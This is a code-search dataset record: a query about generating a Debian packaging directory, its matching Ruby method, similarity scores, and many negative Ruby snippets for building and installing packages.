"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/RYLabs/rails-devcontainer-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-devcontainer-template/(.+)/rails-postgres.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def run(remote = false, branch = 'master')\n if already_released?\n logger.fatal \"Version #{version} had already been released, did you bump the version manually?\"\n exit 1\n end\n File.write(changelog_file, new_content) unless remote\n id = commit_changelog(nil, remote, branch) if options[:commit]\n logger.info \"The changelog has been updated to version #{version}\"\n id\n end",
"def update_github\n unless environment_is_production\n puts 'NOT updating github because environment is not production'\n return false\n end\n\n puts 'pushing database to github'\n\n @scraper_log.info \"------------------------------\"\n @scraper_log.info \"updating git\"\n @scraper_log.info \"------------------------------\"\n x = Subexec.run \"git add #{@db_dump_file} #{@status_file_name}\"\n x = Subexec.run \"git commit -m 'Updated database dump file and status.json with new hr.gov.ge data'\"\n x = Subexec.run \"git push origin master\"\nend"
] | [
"0.7835676",
"0.64839965",
"0.5969037",
"0.5942226",
"0.5895876",
"0.58421993",
"0.5836047",
"0.5763407",
"0.57430965",
"0.57420176",
"0.56336474",
"0.55841255",
"0.5577395",
"0.55551475",
"0.55478275",
"0.5509306",
"0.54801506",
"0.54568374",
"0.54221076",
"0.53568935",
"0.5320292",
"0.53012246",
"0.52911866",
"0.5272126",
"0.52704924",
"0.52664596",
"0.5264678",
"0.5253686",
"0.52408135",
"0.52274716",
"0.5225195",
"0.52222216",
"0.51910114",
"0.51649463",
"0.5163986",
"0.5163906",
"0.5159945",
"0.51519954",
"0.51254153",
"0.51212865",
"0.5107526",
"0.5062604",
"0.50582314",
"0.50493026",
"0.5027674",
"0.5026496",
"0.5020084",
"0.5012091",
"0.49969897",
"0.49775195",
"0.49644232",
"0.49594262",
"0.49586478",
"0.49551764",
"0.49532193",
"0.49361262",
"0.49238154",
"0.49223223",
"0.49125284",
"0.49039868",
"0.49039868",
"0.48999023",
"0.48988232",
"0.48851907",
"0.48759314",
"0.48644456",
"0.48535353",
"0.4844647",
"0.48406643",
"0.48392317",
"0.48382595",
"0.48369414",
"0.4836931",
"0.48317817",
"0.48204598",
"0.4800055",
"0.47921088",
"0.47736108",
"0.47683573",
"0.47642",
"0.47533065",
"0.4752743",
"0.47494763",
"0.47447237",
"0.47426197",
"0.4733374",
"0.47305873",
"0.4727561",
"0.47162762",
"0.47159657",
"0.47141322",
"0.47094405",
"0.4708716",
"0.4707381",
"0.47072512",
"0.47042134",
"0.4703691",
"0.47017205",
"0.47005036",
"0.4698235"
] | 0.7725159 | 1 |
Generate the debian/ subfolder including control/rules/install files to prepare the debian package build instructions | def generate_debian_dir(pkginfo, dir, options)
options, unknown_options = Kernel.filter_options options,
:distribution => nil,
:override_existing => true,
:patch_dir => nil
distribution = options[:distribution]
# Prepare fields for template
package_info = pkginfo
debian_name = debian_name(pkginfo)
debian_version = debian_version(pkginfo, distribution)
versioned_name = versioned_name(pkginfo, distribution)
short_documentation = pkginfo.short_documentation
documentation = pkginfo.documentation
origin_information = pkginfo.origin_information
source_files = pkginfo.source_files
upstream_name = pkginfo.name
copyright = pkginfo.copyright
license = pkginfo.licenses
deps = @dep_manager.filtered_dependencies(pkginfo)
# Debian names of rock packages
deps_rock_packages = deps[:rock]
deps_osdeps_packages = deps[:osdeps]
deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact
dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten
build_dependencies = dependencies.dup
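# Qualify the rock autobuild tool packages for this build type with the release name and add them as build dependencies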
this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)
@rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|
name = debian_name(pkginfo)
build_dependencies << this_rock_release.packageReleaseName(name)
end
# To handle postinstall
DEFAULT_BUILD_DEPENDENCIES.each do |dep|
build_dependencies << dep
end
DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|
dependencies << dep
end
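# Add build-system specific tooling depending on the package's build type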
if pkginfo.build_type == :cmake
build_dependencies << "cmake"
elsif pkginfo.build_type == :orogen
build_dependencies << "cmake"
orogen_command = pkginfo.orogen_command
elsif pkginfo.build_type == :autotools
if pkginfo.using_libtool
build_dependencies << "libtool"
end
build_dependencies << "autotools-dev" # as autotools seems to be virtual...
build_dependencies << "autoconf"
build_dependencies << "automake"
build_dependencies << "dh-autoreconf"
elsif pkginfo.build_type == :ruby
if pkginfo.is_bundle?
build_dependencies << "cmake"
else
raise "debian/control: cannot handle ruby package"
end
elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package
build_dependencies << "cmake"
else
raise "debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}"
end
Packager.info "Required OS Deps: #{deps_osdeps_packages}"
Packager.info "Required Nonnative Deps: #{deps_nonnative_packages}"
dir = cleanup_existing_dir(dir, options)
existing_debian_dir = File.join(pkginfo.srcdir,"debian")
template_dir =
if File.directory?(existing_debian_dir)
existing_debian_dir
else
TEMPLATES
end
FileUtils.mkdir_p dir
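# Render each ERB template from the template directory into the target debian/ folder, preserving relative paths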
Find.find(template_dir) do |path|
next if File.directory?(path)
template = ERB.new(File.read(path), nil, "%<>", path.gsub(/[^\w]/, '_'))
rendered = template.result(binding)
target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)
FileUtils.mkdir_p File.dirname(target_path)
File.open(target_path, "w") do |io|
io.write(rendered)
end
end
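# Optionally overlay patches onto the generated debian files, restricted to the whitelisted ones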
if options[:patch_dir]
whitelist = [ "debian/rules","debian/control","debian/install" ]
if patch_pkg_dir(pkginfo.name, options[:patch_dir],
whitelist: whitelist,
pkg_dir: pkginfo.srcdir,
options: patch_options())
Packager.warn "Overlay patch applied to debian folder of #{pkginfo.name}"
end
end
########################
# debian/compat
########################
compatfile = File.join(dir,"compat")
set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def install\n run \"bundle exec backup generate:config --config-path=config/backup\" unless File.exists?(\"config/backup/config.rb\")\n template \"general.rb\", \"config/backup/models/general.rb\"\n if File.exists? \".env\"\n append_file \".env\" do\n File.read(File.expand_path(find_in_source_paths('env.env')))\n end\n else\n template \"env.env\", \".env\"\n end\n run \"bundle exec wheneverize .\" unless File.exists?(\"config/schedule.rb\")\n append_file \"config/schedule.rb\" do\n File.read(File.expand_path(find_in_source_paths('schedule.rb')))\n end\n end",
"def install\n # # Changes log level to default value\n # inreplace \"etc/baetyl/conf.yml\" do |s|\n # s.gsub! \"level: debug\", \"\"\n # end\n\n bin.install Dir[\"bin/*\"]\n etc.install Dir[\"etc/*\"]\n end",
"def main\n generate_config unless $dont_gen_conf\n\n if $just_gen_conf\n puts \"\\nSkips installing, just generated the config file!\".pink\n exit(0)\n end\n \n install_dependencies if $install_req\n\n install_to_directory\nend",
"def install_management\n # Needed to play with the configuration database.\n package 'debconf'\n package 'debconf-utils'\n\n # Keys for Debian packages.\n package 'debian-archive-keyring'\n\n # Fetch files via HTTP.\n package 'curl'\n package 'wget'\n\n package 'dpkg-dev' # Builds packages from source.\n package 'openssh-server' # SSH into the box.\n\n # For gems with native extensions.\n package 'build-essential'\n package 'g++'\n\n # Pull code from version control.\n package 'subversion'\n package 'git-core'\n\n package 'avahi-daemon' # mDNS, a.k.a. Bonjour\n package 'ddclient' # dynamic DNS\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def install\n system \"python\", \"setup.py\", \"install\"\n\n # Make BUSCO read config.ini from current directory\n inreplace \"scripts/run_BUSCO.py\", \"BuscoConfig('%s/../config/config.ini' % os.path.dirname(os.path.realpath(__file__))\", \"BuscoConfig('config.ini'\"\n \n bin.install \"scripts/run_BUSCO.py\"\n bin.install \"scripts/generate_plot.py\"\n bin.install_symlink \"run_BUSCO.py\" => \"busco\"\n\n # Set correct directories in config template\n inreplace \"config/config.ini.default\", \"/usr/bin/\", \"/mnt/lustre/software/linuxbrew/colsa/bin/\"\n inreplace \"config/config.ini.default\", \"/home/osboxes/BUSCOVM/augustus/augustus-3.2.2/bin/\", \"/mnt/lustre/software/linuxbrew/colsa/bin/\"\n inreplace \"config/config.ini.default\", \"/home/osboxes/BUSCOVM/augustus/augustus-3.2.2/scripts/\", \"/mnt/lustre/software/linuxbrew/colsa/Cellar/augustus/3.2.2_2/libexec/scripts/\"\n inreplace \"config/config.ini.default\", \"/home/osboxes/BUSCOVM/hmmer/hmmer-3.1b2-linux-intel-ia32/binaries/\", \"/mnt/lustre/software/linuxbrew/colsa/bin/\"\n libexec.install Dir[\"config\"]\n doc.install \"BUSCO_v3_userguide.pdf\"\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def install\n# Dependency tracking only, uncomment this section only if you know what you\n# are doing!\n#\n# mkdir 'build'\n# cd 'build' do\n# system \"cmake .. #{std_cmake_parameters}\"\n# system \"make package\"\n# end\nend",
"def install\n copy_envrc\n copy_database_yml\n copy_docker_db_setup_sh\n system(`direnv allow`)\n print(\"#{readme}\\n\")\n end",
"def branded_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n var_dir = \"/var/tmp\"\n tmp_dir = options['clientdir']+\"/\"+var_dir\n post_file = tmp_dir+\"/postinstall.sh\"\n tmp_file = \"/tmp/zone_\"+options['name']\n pkg_name = \"pkgutil.pkg\"\n pkg_url = $local_opencsw_mirror+\"/\"+pkg_name\n pkg_file = tmp_dir+\"/\"+pkg_name\n wget_file(options,pkg_url,pkg_file)\n file = File.open(tmp_file,\"w\")\n file.write(\"#!/usr/bin/bash\\n\")\n file.write(\"\\n\")\n file.write(\"# Post install script\\n\")\n file.write(\"\\n\")\n file.write(\"cd #{var_dir} ; echo y |pkgadd -d pkgutil.pkg CSWpkgutil\\n\")\n file.write(\"export PATH=/opt/csw/bin:$PATH\\n\")\n file.write(\"pkutil -i CSWwget\\n\")\n file.write(\"\\n\")\n file.close\n message = \"Information:\\tCreating post install script \"+post_file\n command = \"cp #{tmp_file} #{post_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def setup_before_restart\n tcs_static = node['thecollegesound']['static_root']\n tcs_app = File.join(node['thecollegesound']['app_root'], 'current')\n\n # -- Link statics (css, js, basic images)\n # FIXME: Consolidate the image directories\n ['css', 'js', 'images', 'icons', 'img'].each do |dir|\n link \"#{tcs_static}/static/#{dir}\" do\n to \"#{tcs_app}/collegesound/static/#{dir}\"\n end\n end\n\n # -- Link templates\n link \"#{tcs_static}/templates\" do\n to \"#{tcs_app}/collegesound/templates\"\n end\n\n # -- Install the package\n bash 'install_package' do\n user 'root'\n cwd tcs_app\n code 'python setup.py install'\n end\n\n # -- Run migration\n bash 'run_migration' do\n user 'root'\n cwd \"#{tcs_app}/collegesound\"\n code <<-EOH\n python manage.py convert_to_south main\n python manage.py migrate main\n EOH\n end\nend",
"def install\n system \"make\", \"-f\", \"LINUX/Makefile\"\n bin.install 'xum1541cfg'\n end",
"def install\n end",
"def install\n end",
"def install_fake_pkg(name)\n require_relative 'ci-tooling/lib/dpkg'\n Dir.mktmpdir do |tmpdir|\n Dir.chdir(tmpdir) do\n FileUtils.mkpath(\"#{name}/DEBIAN\")\n File.write(\"#{name}/DEBIAN/control\", <<-EOF.gsub(/^\\s+/, ''))\n Package: #{name}\n Version: 999:999\n Architecture: all\n Maintainer: Harald Sitter <sitter@kde.org>\n Description: fake override package for kubuntu ci install checks\n EOF\n system(\"dpkg-deb -b #{name} #{name}.deb\")\n DPKG.dpkg(['-i', \"#{name}.deb\"])\n end\n end\nend",
"def pre_install; end",
"def prepare_for_installation; end",
"def install\n #python executable files\n end",
"def install\n \n end",
"def build_pkg(dist, arch, deps)\n start_dir = Dir.pwd\n build_dir = \"/tmp/rhobuild\"\n version = Rhoconnect::VERSION\n description = '\"Rhoconnect production environment\"'\n prefix = \"/opt/rhoconnect/installer\"\n gem_name = \"rhoconnect-#{version}.gem\"\n\n before_install_script = \"#{build_dir}/unix-like/pre_install.sh\"\n after_install_script = \"#{build_dir}/unix-like/post_install.sh\"\n before_remove_script = \"#{build_dir}/unix-like/pre_uninstall.sh\"\n after_remove_script = \"#{build_dir}/unix-like/post_uninstall.sh\"\n\n `rm -rf #{build_dir}` if File.exist?(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}/unix-like\")\n\n # Copy all necessary Files into the build_dir\n system(\"cp install.sh Gemfile Gemfile.lock #{build_dir}\")\n system(\"cp -r installer/unix-like/*.sh #{build_dir}/unix-like\")\n system(\"cp -r installer/unix-like/*.rb #{build_dir}/unix-like\")\n system(\"cp pkg/#{gem_name} #{build_dir}\")\n\n # cd into the pkg dir so that fpm will create the package into the pkg dir.\n Dir.chdir(\"./pkg\") # it created by build task and should already exist\n\n # Construct fpm command\n fpm_cmd = \"fpm -s dir -t #{dist} -n rhoconnect -v #{version} -a #{arch} -C #{build_dir} --epoch 1 \" +\n \"--before-install #{before_install_script} --after-install #{after_install_script} \" +\n \"--before-remove #{before_remove_script} --after-remove #{after_remove_script} \" +\n \"--prefix #{prefix} --description #{description}\"\n # Add the list of dependencies to the fpm call\n deps.each { |dep| fpm_cmd << \" -d '#{dep}'\" }\n fpm_cmd << \" './'\"\n # Create the package\n system(fpm_cmd)\n # Leave no trace...\n system(\"rm -rf #{build_dir}\")\n Dir.chdir(start_dir)\nend",
"def install_plugins\n download_plugins\n generate_goodies_includes\nend",
"def install\n # Fix build per Makefile instructions\n inreplace \"Makefile\", \"-static\", \"\"\n\n system \"make\"\n bin.install \"muscle\"\n end",
"def install\n end",
"def generate_pkg_contents\n shellout!(\"pkgsend generate #{source_dir} | pkgfmt > #{pkg_manifest_file}.1\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.1 #{pkg_metadata_file} #{transform_file} | pkgfmt > #{pkg_manifest_file}.2\")\n end",
"def cfn_template_cdk\n Dir.chdir(cfn_cdk_dir) do\n %x[npm run build]\n %x[cdk synth]\n end\n end",
"def build\n safesystem \"autoreconf -vfi\"\n configure :prefix => prefix\n make\n end",
"def prepare_config_files\n #Create .config dir\n #Create tucotuco dir\n #Create short dir\n #Create info file\n end",
"def post_install; end",
"def configureInstall\n Dir.chdir(\"nagios-4.0.4\")\n `./configure --with-command-group=nagcmd`\n `make all`\n `make install`\n `make install-init`\n `make install-config`\n `make install-commandmode`\n `make install-webconf`\n end",
"def install\n\tsystem \"make\"\n end",
"def install\n system \"python\", \"setup.py\", \"install\", \"--prefix=#{prefix}\"\n system \"make\", \"man\"\n man1.install gzip(\"cvs2svn.1\", \"cvs2git.1\", \"cvs2bzr.1\")\n prefix.install %w[ BUGS COMMITTERS HACKING\n cvs2bzr-example.options\n cvs2git-example.options\n cvs2hg-example.options\n cvs2svn-example.options contrib ]\n doc.install Dir[\"{doc,www}/*\"]\n end",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def install\n cd(@project_name) do\n puts `rake db:automigrate`\n puts `rake action=\"all\" dev:gen:view`\n puts `thor merb:gem:install`\n puts `bin/rake doc:diagrams`\n end\n end",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend",
"def prepare\n FileUtils.mkdir_p(veewee_autoyast_dir) unless veewee_autoyast_dir.directory?\n FileUtils.cp(sources_dir.join(\"postinstall.sh\"), veewee_autoyast_dir)\n end",
"def pkg_default_install\n bsdstyle = @bsdstyle\n make = @make\n sudo_cmd = ''\n\n if bsdstyle == true\n sudo_cmd = 'sudo'\n end\n if make.length == 0\n make = $bsyscfg.get_make\n end\n\n <<INSTALL\n#{sudo_cmd} #{make} DESTDIR=#{$project_rootdir}/ install\nINSTALL\n end",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def define\n desc \"Create Ruby on Rails plug-in package\"\n task :rails_plugin do\n @dest = \"#@package_dir/#{@name}_#{@version}\"\n makedirs(@dest,:verbose=>false)\n @plugin_files.each do |fn|\n cp(fn, @dest,:verbose=>false)\n add_file(File.basename(fn))\n end\n \n @package_files.each do |fn|\n puts \". #{fn}\" if verbose\n f = File.join(@dest, fn)\n fdir = File.dirname(f)\n unless File.exist?(fdir)\n mkdir_p(fdir,:verbose=>false)\n add_folder(\"#{fdir}/\")\n end\n if File.directory?(fn)\n mkdir_p(f,:verbose=>false)\n add_folder(\"#{fn}/\")\n else\n cp(fn, f, :verbose=>false)\n add_file(fn)\n end\n end\n \n generate_index_files()\n end\n end",
"def _install\n args = Array.new\n # If the project contains a makefile, it is a candidate for a derivative build.\n # In such case, protect 'libraries', 'modules' and 'themes' subdirectories\n # from deletion.\n if component.makefile\n args << '-f' << 'P /libraries/***' # this syntax requires rsync >=2.6.7.\n args << '-f' << 'P /modules/***'\n args << '-f' << 'P /profiles/***'\n args << '-f' << 'P /themes/***'\n end\n if component.drupal?\n args = Array.new\n args << '-f' << 'R /profiles/default/***' # D6\n args << '-f' << 'R /profiles/minimal/***' # D7\n args << '-f' << 'R /profiles/standard/***' # D7\n args << '-f' << 'R /profiles/testing/***' # D7\n args << '-f' << 'P /profiles/***'\n args << '-f' << 'R /sites/all/README.txt'\n args << '-f' << 'R /sites/default/default.settings.php'\n args << '-f' << 'P /sites/***'\n end\n args << '-a'\n args << '--delete'\n component.ignore_paths.each { |p| args << \"--exclude=#{p}\" }\n dst_path = platform.local_path + platform.dest_path(component)\n dont_debug { dst_path.mkpath }\n args << component.local_path.to_s + '/'\n args << dst_path.to_s + '/'\n begin\n runBabyRun 'rsync', args\n rescue => ex\n odie \"Installing or updating #{component.name} failed: #{ex}\"\n end\n end",
"def post_install\n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def generate_packaging_artifacts(workdir, name, binding, project)\n [\"pkginfo\", \"depend\", \"preinstall\", \"preremove\", \"postinstall\", \"proto\"].each do |template|\n target_dir = File.join(workdir, 'packaging')\n FileUtils.mkdir_p(target_dir)\n erb_file(File.join(VANAGON_ROOT, \"resources/solaris/10/#{template}.erb\"), File.join(target_dir, template), false, { :binding => binding })\n end\n end",
"def call\n INSTALL_DIRS.each do |dir|\n FileUtils.mkdir_p Karafka.root.join(dir)\n end\n\n INSTALL_FILES_MAP.each do |source, target|\n target = Karafka.root.join(target)\n next if File.exist?(target)\n\n source = Karafka.core_root.join(\"templates/#{source}\")\n FileUtils.cp_r(source, target)\n end\n end",
"def install\n # nothing to do\n end",
"def install\n ENV[\"XML_CATALOG_FILES\"] = etc/\"xml/catalog\"\n system \"autoreconf\", \"--force\", \"--install\", \"--verbose\" if build.head?\n system \"./configure\", *std_configure_args,\n \"--disable-silent-rules\",\n \"--disable-video\",\n \"--without-python\",\n \"--without-qt\",\n \"--without-gtk\",\n \"--without-x\"\n system \"make\", \"install\"\n end",
"def install\n self.run_preseed if @resource[:responsefile]\n should = @resource[:ensure]\n\n checkforcdrom\n cmd = %w{-q -y}\n\n keep = \"\"\n if config = @resource[:configfiles]\n if config == :keep\n cmd << \"-o\" << 'DPkg::Options::=--force-confold'\n else\n cmd << \"-o\" << 'DPkg::Options::=--force-confnew'\n end\n end\n\n str = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version and --force-yes option\n str += \"=#{should}\"\n cmd << \"--force-yes\"\n end\n\n cmd << :install << str\n\n aptget(*cmd)\n end",
"def define\n desc \"Create Rails plug-in package\"\n task :rails_plugin do\n @dest = \"#@package_dir/#{@name}_#{@version}\"\n makedirs(@dest,:verbose=>false)\n @plugin_files.each do |fn|\n cp(fn, @dest,:verbose=>false)\n add_file(File.basename(fn))\n end\n\n @package_files.each do |fn|\n puts \". #{fn}\" if verbose\n f = File.join(@dest, fn)\n fdir = File.dirname(f)\n unless File.exist?(fdir)\n mkdir_p(fdir,:verbose=>false)\n add_folder(\"#{fdir}/\")\n end\n if File.directory?(fn)\n mkdir_p(f,:verbose=>false)\n add_folder(\"#{fn}/\")\n else\n cp(fn, f, :verbose=>false)\n add_file(fn)\n end\n end\n\n generate_index_files()\n end\n end",
"def installPackages\n Dir.chdir(\"/tmp\")\n `wget http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz`\n `wget http://garr.dl.sourceforge.net/project/nagios/nrpe-2.x/nrpe-2.15/nrpe-2.15.tar.gz`\n `tar -zxf nagios-plugins-1.5.tar.gz`\n `tar -zxf nrpe-2.15.tar.gz`\n Dir.chdir(\"nagios-plugins-1.5\")\n `./configure`\n `make`\n `make install`\n `chown nagios.nagios /usr/local/nagios`\n `chown -R nagios.nagios /usr/local/nagios/libexec`\n Dir.chdir(\"../nrpe-2.15\")\n `./configure`\n `make all`\n `make install-plugin`\n `make install-daemon`\n `make install-daemon-config`\n `make install-xinetd`\n end",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def install_custom!\n package package_name do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n end",
"def make_pkg\n with_src_dir do\n if @tool == 'sbt'\n msg \"Updating Kafka\"\n exec './sbt update'\n msg \"Building Kafka\"\n exec './sbt package'\n #exec './sbt assembly-package-dependency'\n exec './sbt release-tar'\n else\n msg \"Using gradle\"\n exec './gradlew clean'\n exec './gradlew releaseTarGz'\n end\n end\n rel_dir = \"#{@src_dir}/target/RELEASE/kafka_*\"\n source_jar = expand \"#{rel_dir}/kafka_*.jar\"\n cp source_jar, \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/libs\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/config\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/bin\", \"#{@workdir}/usr/lib/kafka\"\n\n build_pkg\n end",
"def build\n cd_and_sh( pkg_dir, build_commands )\n end",
"def install\n template 'Guardfile'\n end",
"def install_dry_crud\n Dir.chdir(self.class.source_root) do\n Dir.glob(File.join('**', '**')).sort.each do |file_source|\n copy_file_source(file_source) if should_copy?(file_source)\n end\n copy_crud_test_model\n end\n\n readme 'INSTALL'\n end",
